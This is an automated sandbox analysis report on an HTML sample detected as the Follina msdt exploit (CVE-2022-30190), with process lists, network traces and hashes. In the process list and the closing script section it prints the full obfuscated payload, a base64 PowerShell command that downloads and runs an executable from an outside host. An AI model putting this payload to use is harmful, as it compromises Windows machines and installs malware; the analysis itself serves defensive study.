Windows
Analysis Report
1024203777.test.html
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5312 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - chrome.exe (PID: 5676 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1960 --fi eld-trial- handle=182 4,i,137576 7759888172 9272,15879 2412807135 86661,1310 72 /prefet ch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - msdt.exe (PID: 5472 cmdline:
"C:\Window s\system32 \msdt.exe" ms-msdt:/ ID%20PCwdI AGnOSTic%2 0-skiP%20f Orce%20-PA raM%20%22I t_rEbrOwsE ForFILE=#7 qnxE3%20IT _LaunchMet hod=Contex tMenu%20IT _BrowseFor File=Aq$(i EX($(iEX(' [SysTEm.TE Xt.eNcOdin G]'+[chAr] 58+[cHAr]5 8+'utF8.ge tstrING([s ysTem.coNv erT]'+[CHa R]0X3a+[Ch Ar]0X3A+'F RomBasE64s TrIng('+[c HAR]34+'c1 RvUC1wck9j RXNzIC1mb3 JDRSAtbmFN RSAnbXNkdC c7JEsgPSBh RGQtdFlwZS AtTUVtQmVS ZGVGaU5JdG lPTiAnW0Rs bEltcG9ydC gidVJsbW9O LkRMbCIsIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgZnFt LHN0cmluZy BELHN0cmlu ZyBFTyx1aW 50IHVsLElu dFB0ciB0KT snIC1uYW1F ICJ6IiAtbk FtRVNQYWNF IE0gLVBhc3 NUaHJ1OyAk Szo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cHM6 Ly9ldmVudG 9yZ2FuaXpl ci5way9uZX diaXRoZXJl MjAwNTRyZm RzLmV4ZSIs IiRFTlY6QV BQREFUQVxB bnlOYW1lLm V4ZSIsMCww KTtzdEFSdC 1TbEVFcCgz KTtyVU5EbG wzMi5leEUg emlwZmxkci 5kbGwsUm91 dGVUaGVDYW xsICIkZU5W OkFQUERBVE FcQW55TmFt ZS5leGUiO1 NUT3AtUFJv Q2VzUyAtZk 9yQ0UgLW5h TUUgJ3NkaW Fnbmhvc3Qn '+[chAR]0x 22+'))'))) )Y/../../. ./../../.. /../../../ ../../.EXE %20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6104 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "C:\U sers\user\ Desktop\10 24203777.t est.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | File source: | ||
Source: | File source: |
Source: | Directory created: | Jump to behavior |
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | Virustotal: |
Source: | File created: | Jump to behavior |
Source: | Key opened: |
Source: | Classification label: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | File created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: |
Source: | Window detected: |
Source: | Directory created: | Jump to behavior |
Source: | String : | ||
Source: | String : |
Source: | Window / User API: |
Source: | Process created: | ||
Source: | Process created: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Data Encoding | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Scripting | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Ingress Tool Transfer | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
10% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | high | |
www.google.com | 172.217.168.36 | true | false | high | |
clients.l.google.com | 172.217.168.78 | true | false | high | |
clients2.google.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
IP |
---|
192.168.2.1 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696527 |
Start date and time: | 2022-09-02 13:36:20 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 1024203777.test.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 27 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@39/0@4/7 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.153.199, 142.250.203.106, 172.217.168.67
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-4g5edn6k.gvt1.com, r5---sn-4g5ednsz.gvt1.com, arc.msn.com, r3---sn-4g5edns6.gvt1.com, r2---sn-4g5edn6r.gvt1.com, r2.sn-4g5edn6r.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, optimizationguide-pa.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
File type: | |
Entropy (8bit): | 6.048046902595105 |
TrID: | |
File name: | 1024203777.test.html |
File size: | 19364 |
MD5: | c389f7ee1d9e6376b7d96e80d7a1ffe1 |
SHA1: | 2d0b931cf7cecddddb35457a5719353840f8ca66 |
SHA256: | 8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da |
SHA512: | 7de15cf2ed560a6ff7e7fd5d3c8b0e4f13ca585bab09d40e89785fc12f5b4c79d9f4cec4034b3f40f4ca54abab100e27947867558dbc7876366a8b614eea0ffc |
SSDEEP: | 384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW |
TLSH: | C092C0E9EECC15EB09D1E230F66438DC05A60D4B117A21914CAF3EAD8FCD7535C1A6B1 |
File Content Preview: | <!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:37:24.915282011 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.915332079 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:24.915498972 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.924937963 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.924977064 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.925056934 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.927174091 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:24.927206993 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:24.946683884 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.946722031 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.946855068 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.948600054 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.948622942 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.949013948 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:24.949033976 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:24.986951113 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.009305000 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.011080027 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.041279078 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:25.041321993 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.041929960 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.041959047 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042216063 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.042241096 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042694092 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042783022 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.042821884 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.042890072 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.043325901 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.043339968 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:25.043397903 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:25.046626091 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.046747923 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.046799898 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:25.046868086 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:25.163743019 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.188330889 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.188591957 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.188762903 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.188791990 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.189939976 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.190104961 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.190227985 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.190248013 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.190496922 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.190658092 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221560001 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221662998 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.221697092 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221721888 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.221776962 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.230128050 CEST | 49721 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.230158091 CEST | 443 | 49721 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247797966 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247860909 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.247884035 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247904062 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.247961998 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.266376019 CEST | 49719 | 443 | 192.168.2.3 | 216.58.215.237 |
Sep 2, 2022 13:37:26.266402960 CEST | 443 | 49719 | 216.58.215.237 | 192.168.2.3 |
Sep 2, 2022 13:37:26.366204977 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:26.366235971 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:37:26.465065002 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:37:28.156482935 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.156534910 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.156655073 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.157052994 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.157066107 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.212338924 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.214014053 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.214044094 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.215162039 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.215795994 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.247773886 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.247946978 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.383994102 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:28.384033918 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:28.570386887 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.238847971 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:38.238976955 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:37:38.239082098 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.762368917 CEST | 49729 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:37:38.762418985 CEST | 443 | 49729 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:11.519614935 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:11.519629955 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:38:28.212451935 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:28.212832928 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.212892056 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.212997913 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.213148117 CEST | 443 | 49723 | 172.217.168.78 | 192.168.2.3 |
Sep 2, 2022 13:38:28.213227034 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.213227034 CEST | 49723 | 443 | 192.168.2.3 | 172.217.168.78 |
Sep 2, 2022 13:38:28.213243008 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.265316963 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.311297894 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.321794033 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.321815014 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.322848082 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Sep 2, 2022 13:38:28.323334932 CEST | 49781 | 443 | 192.168.2.3 | 172.217.168.36 |
Sep 2, 2022 13:38:28.323546886 CEST | 443 | 49781 | 172.217.168.36 | 192.168.2.3 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:37:24.670469999 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:24.671158075 CEST | 60582 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:24.687956095 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:37:24.698611975 CEST | 53 | 60582 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:37:28.119664907 CEST | 65320 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:37:28.150039911 CEST | 53 | 65320 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 13:38:28.191190004 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 13:38:28.211313963 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 13:37:24.670469999 CEST | 192.168.2.3 | 8.8.8.8 | 0x7c79 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:37:24.671158075 CEST | 192.168.2.3 | 8.8.8.8 | 0x4d5c | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:37:28.119664907 CEST | 192.168.2.3 | 8.8.8.8 | 0x287d | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:38:28.191190004 CEST | 192.168.2.3 | 8.8.8.8 | 0xc090 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 13:37:24.687956095 CEST | 8.8.8.8 | 192.168.2.3 | 0x7c79 | No error (0) | 216.58.215.237 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:37:24.698611975 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d5c | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | ||
Sep 2, 2022 13:37:24.698611975 CEST | 8.8.8.8 | 192.168.2.3 | 0x4d5c | No error (0) | 172.217.168.78 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:37:28.150039911 CEST | 8.8.8.8 | 192.168.2.3 | 0x287d | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:38:28.211313963 CEST | 8.8.8.8 | 192.168.2.3 | 0xc090 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49721 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:37:26 UTC | 0 | OUT | |
2022-09-02 11:37:26 UTC | 1 | IN | |
2022-09-02 11:37:26 UTC | 2 | IN | |
2022-09-02 11:37:26 UTC | 2 | IN | |
2022-09-02 11:37:26 UTC | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49719 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:37:26 UTC | 0 | OUT | |
2022-09-02 11:37:26 UTC | 1 | OUT | |
2022-09-02 11:37:26 UTC | 3 | IN | |
2022-09-02 11:37:26 UTC | 4 | IN | |
2022-09-02 11:37:26 UTC | 4 | IN |
Click to jump to process
Target ID: | 0 |
Start time: | 13:37:18 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 13:37:21 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 4 |
Start time: | 13:37:23 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 17 |
Start time: | 13:38:28 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78dd30000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Script: |
---|
Code | ||
---|---|---|
0 | location.href = "MS-msd" + "t:/I" + "D" + " " + "P" + "CwdIAGnOST" + "i" + "c" + " " + "-s" + "kiP" + " " + "fO" + "rce" + " " + "-PAra" + "M" + " " + "\"" + "It_rEb" + "rOwsEF" + "orFI" + "LE=" + "#7qnxE3" + " " + "IT_LaunchMethod" + "=Cont" + "extMen" + "u" + " " + "IT_Browse" + "ForFile=" + "A" + "q" + "$(" + "iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbG" + "UoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV" + "4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEF" + "cQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyA" + "tZk" + 